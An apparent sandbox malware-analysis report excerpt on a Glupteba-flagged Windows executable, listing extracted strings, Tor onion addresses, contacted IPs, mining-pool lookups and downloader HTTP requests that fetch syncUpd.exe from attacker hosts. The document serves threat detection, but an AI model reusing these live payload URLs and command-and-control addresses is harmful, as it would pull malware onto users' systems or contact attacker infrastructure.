:: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C1B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 0b1c1115494a5c52100110515d52141b57170d14161d12025206141340084056005707170746501e16121203571c1452160c10121450010500175112041a055b0c0b0a070bhttps://statsexplorer.orghttp://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onion.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: s25519: internal error: setShortBytes called with a long stringhttp2: Transport closing idle conn %p (forSingleUse=%v, maxStream=%v)http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.oniontls: handshake message of length %d bytes exceeds maximum o
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: nvalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackint
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1593892332.000000000C0A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: PS C:\Users\user\AppData\Local\Temp> C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeC:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exehttp://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionC:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\WindowsAppsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.comC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.exeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.batC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.cmdC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.vbsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.vbeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.jsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.jseC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.wsfC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.wshC:\Program Files (x86)\Common Fi
                        Source: global trafficTCP traffic: 192.168.2.9:49707 -> 51.195.138.197:14433
                        Source: global trafficTCP traffic: 192.168.2.9:49709 -> 51.15.58.224:14433
                        Source: Joe Sandbox ViewIP Address: 185.172.128.90 185.172.128.90
                        Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
                        Source: Joe Sandbox ViewIP Address: 51.15.58.224 51.15.58.224
                        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.127
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.127
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.127
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.127
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.127
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.109
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.109
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.109
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.109
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.109
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.64.33
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.64.33
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.64.33
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.64.33
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.64.33
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET /raw/2HQ8Rbid HTTP/1.1Accept: */*Connection: closeHost: pastebin.comUser-Agent: cpp-httplib/0.12.6
                        Source: global trafficHTTP traffic detected: GET /cpa/ping.php?substr=four&s=ab HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: 185.172.128.90Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /syncUpd.exe HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: 185.172.128.127Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /syncUpd.exe HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: 185.172.128.109Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /ping.php?substr=four HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: 5.42.64.33Connection: Keep-AliveCache-Control: no-cache
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: OS X; U; en) Presto/2.6.30 Version/10.61facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)tls: internal error: handshake returned an error but is marked successfultls: received unexpected handshake message of type %T when waiting for %T equals www.facebook.com (Facebook)
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: o Debian/1.6-7Mozilla/5.0 (compatible; Konqueror/3.3; Linux 2.6.8-gentoo-r3; X11;facebookscraper/1.0( http://www.facebook.com/sharescraper_help.php)2695994666715063979466701508701962594045780771442439172168272236806126959946667150639794667015087019630673557916 equals www.facebook.com (Facebook)
                        Source: global trafficDNS traffic detected: DNS query: xmr-eu2.nanopool.org
                        Source: global trafficDNS traffic detected: DNS query: pastebin.com
                        Source: global trafficDNS traffic detected: DNS query: xmr-eu1.nanopool.org
                        Source: InstallSetup4.exe, 00000003.00000003.2241896798.000000000067B000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000002.2242373966.000000000067B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.109/en-GB
                        Source: InstallSetup4.exe, 00000003.00000002.2242373966.00000000006B3000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000003.2241896798.000000000067B000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000003.2241896798.00000000006B3000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000002.2242373966.000000000067B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.109/syncUpd.exe
                        Source: InstallSetup4.exe, 00000003.00000002.2242373966.00000000006B3000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000003.2241896798.00000000006B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.109/syncUpd.exe_
                        Source: InstallSetup4.exe, 00000003.00000002.2242373966.0000000000648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.109/syncUpd.exehttp://5.42.64.33/ping.php?substr=fourSOFTWARE
                        Source: InstallSetup4.exe, 00000003.00000003.2241896798.000000000067B000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000002.2242373966.000000000067B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.127/
                        Source: InstallSetup4.exe, 00000003.00000003.2241896798.000000000067B000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000002.2242373966.000000000067B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.127/i
                        Source: InstallSetup4.exe, 00000003.00000003.2241896798.000000000067B000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000002.2242373966.000000000067B000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000002.2242373966.0000000000648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.127/syncUpd.exe
                        Source: InstallSetup4.exe, 00000003.00000002.2242373966.000000000067B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.90/cpa/ping.php?substr=four&s=ab
                        Source: InstallSetup4.exe, 00000003.00000002.2242373966.0000000000648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.90/cpa/ping.php?substr=four&s=ab/SILENT/TOSTACK/NOCANCELget
                        Source: InstallSetup4.exe, 00000003.00000003.2241896798.000000000067B000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000002.2242373966.000000000067B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.90/cpa/ping.php?substr=four&s=abG
                        Source: InstallSetup4.exe, 00000003.00000003.2241896798.000000000067B000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000002.2242373966.000000000067B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.90/cpa/ping.php?substr=four&s=abt
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C194000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C1E0000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C184000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onion
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1593892332.000000000C0A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionC:
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C194000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionhttp://3ebu257qh2dlauxqj7cgv3i5
                        Source: InstallSetup4.exe, 00000003.00000002.2242373966.00000000006B3000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000003.2241896798.00000000006B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.64.33/G
                        Source: InstallSetup4.exe, 00000003.00000003.2241896798.000000000067B000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000002.2242373966.000000000067B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.64.33/ing.php?substr=fourh
                        Source: InstallSetup4.exe, 00000003.00000002.2242373966.00000000006B3000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000003.2241896798.000000000067B000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000003.2241896798.00000000006B3000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000002.2242373966.000000000067B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.64.33/ping.php?substr=four
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: http://archive.org/details/archive.org_bot)Mozilla/5.0
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1479923842.0000000002830000.00000040.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.g
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp, vueqjgslwynd.exe, 0000001B.00000003.1474933632.000001EBD15A0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp, vueqjgslwynd.exe, 0000001B.00000003.1474933632.000001EBD15A0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
                        Source: vueqjgslwynd.exe, 0000001B.00000003.1474933632.000001EBD15A0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp, vueqjgslwynd.exe, 0000001B.00000003.1474933632.000001EBD15A0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: http://devlog.gregarius.net/docs/ua)Links
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: http://grub.org)Mozilla/5.0
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: http://help.yahoo.com/help/us/ysearch/slurp)SonyEricssonK550i/R1JD
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://https://_bad_pdb_file.pdb
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: http://invalidlog.txtlookup
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: http://localhost:3433/https://duniadekho.baridna:
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: http://misc.yahoo.com.cn/help.html)QueryPerformanceFrequency
                        Source: InstallSetup4.exe, 00000003.00000000.1359934275.000000000040A000.00000008.00000001.01000000.00000007.sdmp, InstallSetup4.exe, 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: http://search.msn.com/msnbot.htm)msnbot/1.1
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: http://search.msn.com/msnbot.htm)net/http:
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: http://search.msn.com/msnbot.htm)pkcs7:
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.oniontls:
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: http://www.alexa.com/help/webmasters;
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: http://www.alltheweb.com/help/webmaster/crawler)Mozilla/5.0
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: http://www.archive.org/details/archive.org_bot)Opera/9.80
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: http://www.avantbrowser.com)MOT-V9mm/
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003660000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.avantbrowser.com)MOT-V9mm/00.62
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: http://www.bloglines.com)Frame
                        Source: BroomSetup.exe, 00000005.00000000.1369842650.000000000041C000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.broomcleaner.com/buyOpen
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: http://www.everyfeed.com)explicit
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: http://www.exabot.com/go/robot)Opera/9.80
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: http://www.google.c
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: http://www.google.com/bot.html)Mozilla/5.0
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: http://www.google.com/bot.html)crypto/ecdh:
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: http://www.google.com/feedfetcher.html)HKLM
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: http://www.googlebot.com/bot.html)Links
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: http://www.spidersoft.com)
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: http://yandex.com/bots)Opera
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: http://yandex.com/bots)Opera/9.51
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: https://blockchain.infoindex
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: https://blockstream.info/apiinva
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: https://cdn.discordapp.com/attachments/1088058556286251082/1111230812579450950/TsgVtmYNoFT.zipMozill
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: https://github.com/Snawoot/opera-proxy/releases/download/v1.2.2/opera-proxy.windows-386.exeBlackBerr
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsonsize
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C18A000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C1E0000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C184000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://statsexplorer.org
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C18A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://statsexplorer.orgServers
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C1E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://statsexplorer.orghttp://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onion
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C1B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://statsexplorer.orghttp://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onion.COM;.
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C1E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://statsexplorer.orghttp://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionSELECT
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C184000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://statsexplorer.orghttp://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionWbemSc
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C18A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://statsexplorer.orghttps://statsexplorer.org
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: https://turnitin.com/robot/crawlerinfo.html)cannot
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeCode function: 3_2_0040571B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,3_2_0040571B

                        E-Banking Fraud

                        barindex
                        Yara detected Glupteba
                        Source: Yara matchFile source: 32.2.288c47bbc1871b439df19ff4df68f076.exe.400000.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 32.2.288c47bbc1871b439df19ff4df68f076.exe.2da0e67.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.288c47bbc1871b439df19ff4df68f076.exe.2d70e67.11.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.288c47bbc1871b439df19ff4df68f076.exe.400000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.3.288c47bbc1871b439df19ff4df68f076.exe.3660000.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 32.3.288c47bbc1871b439df19ff4df68f076.exe.3690000.5.unpack, type: UNPACKEDPE
